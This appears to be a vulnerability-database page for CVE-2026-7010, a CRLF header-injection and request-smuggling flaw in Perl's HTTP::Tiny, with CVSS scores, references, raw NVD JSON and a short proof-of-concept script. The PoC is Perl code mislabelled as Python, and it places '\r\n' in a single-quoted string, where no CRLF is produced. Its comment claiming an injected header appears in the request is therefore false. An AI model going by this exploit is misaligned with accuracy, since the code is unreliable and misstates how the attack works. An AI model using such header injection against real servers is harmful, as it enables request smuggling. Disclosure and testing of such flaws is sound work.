CVE-2026-7010

Description

HTTP::Tiny versions before 0.093 for Perl do not validate CRLF in HTTP request lines or control field header values. The unvalidated inputs are the method and URI in the request line, the URL host that becomes the `Host:` header, and HTTP/1.1 control data field values. An attacker who controls one of these inputs, for example a user supplied URL passed to a webhook or URL fetch endpoint, can inject additional headers and smuggle requests to the upstream server.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

HTTP::Tiny < 0.093

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

use HTTP::Tiny;
use strict;
use warnings;

# Create a new HTTP::Tiny instance (Vulnerable version < 0.093)
my $ua = HTTP::Tiny->new();

# Malicious URL containing CRLF characters to inject headers
# The URL includes \r\n which splits the request line and adds a custom header
my $malicious_url = 'http://example.com/api\r\nX-Injected-Header: pwned\r\n';

print "Sending request to: $malicious_url\n";

# The vulnerable library will send the following raw request:
# GET /api HTTP/1.1
# Host: example.com
# X-Injected-Header: pwned
# ...

my $response = $ua->get($malicious_url);

if ($response->{success}) {
    print "Request sent.\n";
} else {
    print "Request failed: " . $response->{status} . " " . $response->{reason} . "\n";
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-7010
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-7010
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-7010/
[4] VulDB https://vuldb.com/cve/CVE-2026-7010
[5] https://github.com/Perl-Toolchain-Gang/HTTP-Tiny/commit/d73c7651e82ace02693842df55928b6c3ae7c38d.patch
[6] https://metacpan.org/release/HAARG/HTTP-Tiny-0.093-TRIAL/changes
[7] http://www.openwall.com/lists/oss-security/2026/05/11/17

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-7010", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-05-11T22:22:14.750", "lastModified": "2026-05-12T16:48:58.260", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "HTTP::Tiny versions before 0.093 for Perl do not validate CRLF in HTTP request lines or control field header values.\n\nThe unvalidated inputs are the method and URI in the request line, the URL host that becomes the `Host:` header, and HTTP/1.1 control data field values.\n\nAn attacker who controls one of these inputs, for example a user supplied URL passed to a webhook or URL fetch endpoint, can inject additional headers and smuggle requests to the upstream server."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-113"}]}], "references": [{"url": "https://github.com/Perl-Toolchain-Gang/HTTP-Tiny/commit/d73c7651e82ace02693842df55928b6c3ae7c38d.patch", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "https://metacpan.org/release/HAARG/HTTP-Tiny-0.093-TRIAL/changes", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/11/17", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}